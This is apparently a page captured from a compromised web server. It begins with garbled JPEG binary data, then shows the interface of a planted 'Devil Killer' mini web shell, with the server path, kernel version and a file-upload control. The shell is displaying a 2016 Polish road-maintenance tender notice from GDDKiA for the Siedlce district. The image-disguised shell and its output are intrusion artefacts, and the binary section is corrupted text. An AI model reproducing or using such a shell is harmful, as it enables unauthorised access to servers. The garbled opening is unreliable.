JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160610/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160610/80039-N-2016.html

<p class="kh_header"><b>Warszawa: Bieżące i zimowe utrzymanie dróg krajowych zarządzanych przez Generalną Dyrekcję Dróg Krajowych i Autostrad Oddział w Warszawie na terenie Rejonu w Siedlcach.</b><br>
<b>Numer ogłoszenia: 80039 - 2016; data zamieszczenia: 10.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Warszawie , ul. Mińska 25, 03-808 Warszawa, woj. mazowieckie, tel. 22 2092500, 22 2092360, faks 22 6986045, 22 2092474.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gddkia.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące i zimowe utrzymanie dróg krajowych zarządzanych przez Generalną Dyrekcję Dróg Krajowych i Autostrad Oddział w Warszawie na terenie Rejonu w Siedlcach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bieżące i zimowe utrzymanie dróg krajowych zarządzanych przez Generalną Dyrekcję Dróg Krajowych i Autostrad Oddział w Warszawie na terenie Rejonu w Siedlcach..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.23.31.40-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.24.52-5, 45.23.31.42-6, 77.31.41.00-5, 77.31.20.00-1, 90.00.00.00-7, 90.62.00.00-9, 90.63.00.00-2, 90.61.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 100 000,00 zł (słownie: sto tysięcy zł, 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt III.4.1. niniejszego Ogłoszenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie: 
a) 2 zadań obejmujących remonty cząstkowe nawierzchni asfaltowych 
na drogach/ulicach klasy  min. G, w technologii napraw mieszankami mineralno-asfaltowymi wytwarzanymi i wbudowywanymi na gorąco (z betonu asfaltowego) w ilości nie mniejszej niż 1000 m2 dla każdego zadania,
oraz
b) 2 zadań obejmujących wykonanie nawierzchni asfaltowych typu SMA lub na asfaltach  modyfikowanych na drogach klasy min. G o długości odcinka min 1 km każde
oraz 
c) robót na drogach/ulicach klasy min. G, obejmujących między innymi: 
- naprawę/renowację/odbudowę odwodnienia,
- naprawę (profilowanie, ścinka i uzupełnienie) poboczy dróg, 
- naprawę elementów korpusu drogowego, 
Łączna wartość min. 1 000 000, zł brutto z wyłączeniem wartości nawierzchniowych robót asfaltowych.
Każde wykazane zadanie może jednocześnie potwierdzać spełnianie powyższych wymagań.
2) Wykonawca musi wykazać się wiedzą i doświadczeniem w wykonaniu/wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
a) usług obejmujących wycinkę i pielęgnację drzew i krzewów na drogach/ulicach klasy min. G, o łącznej wartości tych usług minimum 200 000,00 zł brutto 
oraz
b) usług z zakresu wykaszania traw i chwastów z pasa drogowego, dróg/ulic klasy minimum G o łącznej wartości prac odebranych (wykonanych należycie) minimum 300 000,00 zł brutto
oraz 
c) usług z zakresu sprzątania pasa drogowego, dróg/ulic klasy minimum G o łącznej wartości prac odebranych (wykonanych należycie) minimum 200 000,00 zł brutto.
oraz
d) usług z zakresu zimowego utrzymania dróg minimum klasy G za łączną kwotę prac odebranych (wykonanych należycie) minimum 3 500 000,00 zł brutto w zakres których wchodziło:
- odśnieżanie i zwalczanie śliskości na drogach
- odśnieżanie i zwalczanie śliskości na chodnikach
- ustawienie i rozebranie zasłon przeciwśnieżnych 
Każde wykazane zadanie może jednocześnie potwierdzać spełnianie powyższych wymagań.
Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień zawarcia danej umowy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Wykonawca musi wskazać narzędzia, wyposażenie zakładu i urządzenia techniczne spełniające wymagania wyszczególnione w poniższej tabeli w celu realizacji zamówienia 1. W zakresie bieżącego utrzymania dróg: Rejon w Siedlcach
Wyszczególnienie sprzętu (parametry)
1a) Frezarki drogowe sterowane elektronicznie o głębokości frezowania regulowanej w zakresie 0-10 cm i o szerokości frezowania: 0,5 m; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 1 szt., w tym w zakresie robót asfaltowych: 1;
1b) Frezarki drogowe sterowane elektronicznie o głębokości frezowania regulowanej w zakresie 0-10 cm i o szerokości frezowania: 1,8 m - 2,00 m; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 1 szt., w tym w zakresie robót asfaltowych: 1;
2) Mała przewoźna wytwórnia mma (recykler) o minimalnej wydajności 1 Mg/h; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 2szt., w tym w zakresie robót asfaltowych: 2;
3) Walec wibracyjny lub zagęszczarka płytowa; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 3 szt., w tym: w zakresie robót asfaltowych: 2, w zakresie robót i usług bieżącego utrzymania: 1;
4) Walec ogumiony - min. 6 ton wyposażony w zespoloną lampę sygnalizacyjną ( belkę świetlną ) na dachu kabiny; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 2szt., w tym: w zakresie robót asfaltowych: 1, w zakresie robót i usług bieżącego utrzymania: 1;
5) Walec stalowy gładki 8-10 Mg lub 11-14 Mg wyposażony w zespoloną lampę sygnalizacyjną (belkę świetlną) na dachu kabiny; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 2szt., w tym: w zakresie robót asfaltowych: 2,
6) Układarka mieszanki mineralno asfaltowej z automatycznym sterowaniem i podgrzewaną deską; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) -1 szt., w tym: w zakresie robót asfaltowych: 1;
7) Skrapiarka do bitumu samojezdna; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) -1 szt., w tym: w zakresie robót asfaltowych: 1;
8) Przyczepa sygnalizacyjna typu autostradowego, wyposażona w pulsary dalekiego ostrzegania, strzały świetlne, znaki: A - 14 i obrotowy znak C - 9/10, z grupy wielkości wielkie, tablica jak i znaki z foli II generacji; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) -6szt., w tym: w zakresie robót asfaltowych: 2, w zakresie robót i usług bieżącego utrzymania: 1; w zakresie wykaszania pasów drogowych: 1; w zakresie sprzątania pasów drogowych: 2.
9) Przyczepa sygnalizacyjna wyposażona w tablice zmiennej treści (VMS); Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 2 szt.;
10) Koparko-ładowarka o poj. Łyżki min. 1,0 m2, wyposażona w zespoloną lampę sygnalizacyjną (belkę świetlną) na dachu kabiny; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) -1szt., w tym w zakresie robót i usług bieżącego utrzymania: 1;
11) Równiarka o mocy min. 120 KM, wyposażona w lampę ostrzegawczą; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 1 szt., w tym w zakresie robót i usług bieżącego utrzymania: 1;
12) Samochód skrzyniowy 8Mg÷12Mg, wyposażony w zespoloną lampę sygnalizacyjną ( belkę świetlną ) na dachu kabiny oraz na tylnej burcie znaki: A - 14 i obrotowy C - 9/10 oraz tablicę U - 3d, folia min. II generacji; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 2 szt., w tym w zakresie robót i usług bieżącego utrzymania: 1; w zakresie wykaszania pasów drogowych: 1. 
13) Samochód samowyładowczy 12Mg÷18Mg, wyposażony w zespoloną lampę sygnalizacyjną ( belkę świetlną ) na dachu kabiny; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 2 szt., w tym w zakresie robót i usług bieżącego utrzymania: 2. 
14) Samochód dostawczy 1,0Mg÷3,5Mg, wyposażony w hak holowniczy, w zespoloną lampę sygnalizacyjną (belkę świetlną) na dachu kabiny oraz na tylnej burcie znaki: A - 14 i obrotowy C - 9/10 oraz tablicę U - 3d, folia min. II generacji; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) -2 szt., w tym: w zakresie robót i usług bieżącego utrzymania: 1; w zakresie wykaszania pasów drogowych: 1. 
15) Ścinarka poboczy; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) -1szt., w tym: w zakresie robót i usług bieżącego utrzymania: 1;
16) Kosiarka bijakowa wysięgnikowa do trawy i drobnych gałązek, doczepna do ciągnika do koszenia na powierzchniach o dużym pochyleniu poprzecznym, tj. na skarpach i przeciwskarpach, o szerokości koszenia min. 120 cm, i wysięgniku min. 6,0 m; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 2 szt., w tym: w zakresie wykaszania pasów drogowych: 2.  
17) Kosiarka bijakowa wysięgnikowa do trawy i drobnych gałązek, doczepna do ciągnika do koszenia na powierzchniach o dużym pochyleniu poprzecznym, tj. na skarpach i przeciwskarpach, o szerokości koszenia min. 120 cm, i wysięgniku min. 9,0 m; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 1 szt., w tym: w zakresie wykaszania pasów drogowych: 1.  
18) Kosiarka bijakowa do trawy i drobnych gałązek, doczepna do ciągnika do koszenia na dużych powierzchniach, o szerokości koszenia min. 200 cm.; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 2 szt., w tym: w zakresie wykaszania pasów drogowych: 2.
19) Kosiarka żyłkowa, spalinowa lub elektryczna, do koszenia w miejscach niedostępnych, takich jak: pod barierami, przy ogrodzeniach, znakach, pachołkach oraz innych urządzeniach drogowych; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 8 szt., w tym: w zakresie wykaszania pasów drogowych: 8.
20) Kosiarka trawnikowa spalinowa, do koszenia na mniejszych powierzchniach eksponowanych, takich jak: wysepki, trawniki; Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 1 szt., w tym: w zakresie wykaszania pasów drogowych: 1.
21) Ciągnik rolniczy (nośnik osprzętu) o mocy silnika min. 110 kM, wyposażony w ostrzegawczą lampę zespoloną (belka świetlna z 2 pomarańczowymi lampami błyskowymi), Razem wymagalna minimalna liczba  jednostek do realizacji zamówienia (szt.) - 1szt., w tym: w zakresie wykaszania pasów drogowych: 1.
22) Ciągnik rolniczy (nośnik osprzętu) o mocy silnika min. 90 kM, wyposażony w ostrzegawczą lampę zespoloną (belka świetlna z 2 pomarańczowymi lampami błyskowymi), Razem wymagalna minimalna liczba jednostek do realizacji zamówienia (szt.) - 4szt., w tym: w zakresie wykaszania pasów drogowych: 4.
2. w zakresie zimowego utrzymania dróg: Rejon w Siedlcach Obwód Drogowy w Siedlcach 1) Wyszczególnienie sprzętu -Nośnik pługa średniego i solarki - pojazd samochodowy o ładowności minimalnej 10 Mg i o mocy silnika min. 240 kM, wyposażony w zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym. Ładowność nośników pługosolarek musi być dostosowana do wielkości (masy) załadowanej i zatankowanej solarki; Wymagana min. liczba jednostek szt.- 4szt., 2) Nośnik pługa średniego - pojazd samochodowy o ładowności min. 8 Mg i o mocy silnika min. 240 KM, wyposażony w zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym; Wymagana min. liczba jednostek szt.-5szt., 3) Równiarka - wyposażona w odkładnicę stalową z lemieszem stalowym (opcjonalnie na żądanie Zamawiającego gumowym) o mocy silnika min. 120 KM, wyposażona w pomarańczową lampę ostrzegawczą; Wymagana min. liczba jednostek szt.-1szt., 4) Ładowarka kołowa - pojemność łyżki min. 2,0 m3, wysokości podnoszenia łyżki min. 4 m i udźwig co najmniej 2,2 Mg, wyposażona w urządzenia tzw. widelce umożliwiające przemieszczanie palet i tzw. Big-Bagów z chlorkiem wapnia, wyposażona w pomarańczową lampę ostrzegawczą zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym. Wyposażona w atestowany system ważenia ładowanych materiałów; Wymagana min. liczba jednostek szt.-1szt., 5) Ładowarko-koparka: pojemność łyżki 1,2 - 1,8 m3, wyposażona w pomarańczową lampę ostrzegawczą; Wymagana min. liczba jednostek szt.-1szt., Obwód Drogowy w Łosicach 1) Wyszczególnienie sprzętu (parametry) - Nośnik pługa średniego i solarki - pojazd samochodowy o ładowności minimalnej 10 Mg i o mocy silnika min. 240 kM, wyposażony w zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym. Ładowność nośników pługosolarek musi być dostosowana do wielkości (masy) załadowanej i zatankowanej solarki; Wymagana min. liczba jednostek szt.-1szt., 2) Nośnik pługa średniego - pojazd samochodowy o ładowności min. 8 Mg i o mocy silnika min. 240 KM, wyposażony w zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym; Wymagana min. liczba jednostek szt.-2szt., 3) Równiarka - wyposażona w odkładnicę stalową z lemieszem stalowym (opcjonalnie na żądanie Zamawiającego gumowym) o mocy silnika min. 120 KM, wyposażona w pomarańczową lampę ostrzegawczą; Wymagana min. liczba jednostek szt.-1szt., 4) Ładowarka kołowa - pojemność łyżki min. 2,0 m3, wysokości podnoszenia łyżki min. 4 m i udźwig co najmniej 2,2 Mg, wyposażona w urządzenia tzw. widelce umożliwiające przemieszczanie palet i tzw. Big-Bagów z chlorkiem wapnia, wyposażona w pomarańczową lampę ostrzegawczą zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym. Wyposażona w atestowany system ważenia ładowanych materiałów; Wymagana min. liczba jednostek szt.-1szt., 5) Ładowarko-koparka: pojemność łyżki 1,2 - 1,8 m3, wyposażona w pomarańczową lampę ostrzegawczą; Wymagana min. liczba jednostek szt.-1szt., Obwód Drogowy w Sokołowie Podlaskim 1) Wyszczególnienie sprzętu (parametry) - Nośnik pługa średniego i solarki - pojazd samochodowy o ładowności minimalnej 10 Mg i o mocy silnika min. 240 kM, wyposażony w zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym. Ładowność nośników pługosolarek musi być dostosowana do wielkości (masy) załadowanej i zatankowanej solarki; Wymagana min. liczba jednostek szt.-5szt., 2) Nośnik pługa średniego - pojazd samochodowy o ładowności min. 8 Mg i o mocy silnika min. 240 KM, wyposażony w zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym; Wymagana min. liczba jednostek szt.-6 szt., 3) Równiarka - wyposażona w odkładnicę stalową z lemieszem stalowym (opcjonalnie na żądanie Zamawiającego gumowym) o mocy silnika min. 120 KM, wyposażona w pomarańczową lampę ostrzegawczą; Wymagana min. liczba jednostek szt.-1szt., 4) Ładowarka kołowa - pojemność łyżki min. 2,0 m3, wysokości podnoszenia łyżki min. 4 m i udźwig co najmniej 2,2 Mg, wyposażona w urządzenia tzw. widelce umożliwiające przemieszczanie palet i tzw. Big-Bagów z chlorkiem wapnia, wyposażona w pomarańczową lampę ostrzegawczą zespoloną lampę sygnalizacyjną/ostrzegawczą (belkę świetlną) ze światłem żółtym przerywanym. Wyposażona w atestowany system ważenia ładowanych materiałów; Wymagana min. liczba jednostek szt.-2szt., 5) Ładowarko-koparka: pojemność łyżki 1,2 - 1,8 m3, wyposażona w pomarańczową lampę ostrzegawczą; Wymagana min. liczba jednostek szt.-1 szt., 6) Solarka - ładowności min. 5 m3, pojemność zbiorników na solankę min 1,0 m3 napęd niezależny od ruchu pojazdu, szerokość posypywania minimalnie regulowana w zakresie 2 ÷ 10 m, gęstość posypywania soli drogowej 5 ÷ 40 g/m2 niezależnie od prędkości pojazdu, uruchamianie i sterowanie pracą z kabiny kierowcy, kolor pomarańczowy lub żółty wyposażone w żółte lampy ostrzegawcze; Wymagana min. liczba jednostek szt.-4 szt., 7) Pług lemieszowy do nośnika samochodowego - z odkładnicą z tworzywa sztucznego ze sterowaniem z kabiny kierowcy zapewniający prawidłowe odśnieżanie pasa drogi o szerokości min. 2,7 m, oznakowany i wyposażony w światła obrysowe; Wymagana min. liczba jednostek szt. - 1 szt., 
Zamawiający dopuszcza wskazanie tego samego sprzętu dla bieżącego oraz dla zimowego utrzymania dróg.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać osoby, które będą uczestniczyć 
w wykonywaniu zamówienia, legitymujące się doświadczeniem odpowiednim do funkcji, jakie zostaną im powierzone. Wykonawca przedstawi wraz z ofertą osobę, na każdą funkcję wymienioną poniżej, którą spełnią poniższe wymagania:
W zakresie robót asfaltowych:
1) Stanowisko - Kierownik robót; Minimalna liczba personelu - 1 osoba; Wymagane uprawnienia -Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno-budowlanych; Doświadczenie zawodowe - Minimum 2 lata na stanowisku kierownika budowy/robót przy wykonywaniu nawierzchni asfaltowych i/lub remontów nawierzchni asfaltowych na drogach min. klasy G.
2) Stanowisko - Majster robót; Minimalna liczba personelu - 2 osoby; Wymagane uprawnienie - Aktualne zaświadczenie o ukończeniu szkolenia z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym, zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 17 września 2003r w sprawie kierowania ruchem drogowym (Dz. U. z 2003 nr 182 poz. 1784); Doświadczenie zawodowe - Minimum 2 lata na stanowisku majstra lub wyższym, wykształcenie min. średnie techniczne
W zakresie robót i usług bieżącego utrzymania dróg:
1) Stanowisko - Kierownik robót; Minimalna liczba personelu - 1 osoba; Wymagane uprawnienia - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno-budowlanych; Doświadczenie zawodowe - Minimum 2 lata przy wykonywaniu/nadzorowaniu robót drogowych na drogach klasy min. G.
2) Stanowisko - Majster robót; Minimalna liczba personelu - 1 osoba; Wymagane uprawnienia - Aktualne zaświadczenie o ukończeniu szkolenia z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym, zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 17 września 2003r w sprawie kierowania ruchem drogowym (Dz. U. z 2003 nr 182 poz. 1784); Doświadczenie zawodowe - Minimum 2 lata na stanowisku majstra lub wyższym, wykształcenie min. średnie techniczne.
W zakresie wykaszania pasów drogowych:
1) Stanowisko -Kierownik prac utrzymania zieleni; Minimalna liczba personelu -1 osoba; Wymagane uprawnienia -  Aktualne zaświadczenie o ukończeniu szkolenia z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym, zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 17 września 2003r w sprawie kierowania ruchem drogowym (Dz. U. z 2003 nr 182 poz. 1784); Doświadczenie zawodowe -Minimum 2 letnie doświadczenie w kierowaniu lub nadzorowaniu prac z zakresu koszenia i/lub sprzątania pasa drogowego na drogach/ulicach klasy min. G - należy wykazać okres (od - do) oraz na jakim zadaniu (nr i odcinki dróg/ulic);
2) Stanowisko - Majster prac utrzymania zieleni; Minimalna liczba personelu - 1 osoba; Wymagane uprawnienia - Aktualne zaświadczenie o ukończeniu szkolenia z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym, zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 17 września 2003r w sprawie kierowania ruchem drogowym (Dz. U. z 2003 nr 182 poz. 1784);Doświadczenie zawodowe -nie wymagane.
 W zakresie zimowego utrzymania dróg:
Rejon w Siedlcach
1)	Stanowisko - Kierownik prac zud; Minimalna liczba personelu - 1 osoba; Wymagane uprawnienia -  nie wymagane; Doświadczenie zawodowe - Min. 12 miesięczne doświadczenie zawodowe przy zimowym utrzymaniu dróg/ulic klasy min. G na stanowisku dyspozytora lub jego zastępcy - należy wykazać okres (od - do) oraz na jakim zadaniu (nr i odcinki dróg/ulic);
2)	Stanowisko - Z-ca Kierownika prac zud; Minimalna liczba personelu - 1 osoba; Wymagane uprawnienia - nie wymagane; Doświadczenie zawodowe - Min. 9 miesięczne doświadczenie zawodowe przy zimowym utrzymaniu dróg/ ulic klasy min. G na stanowisku dyspozytora lub jego zastępcy - należy wykazać okres (od - do) oraz na jakim zadaniu (nr i odcinki dróg/ulic); 
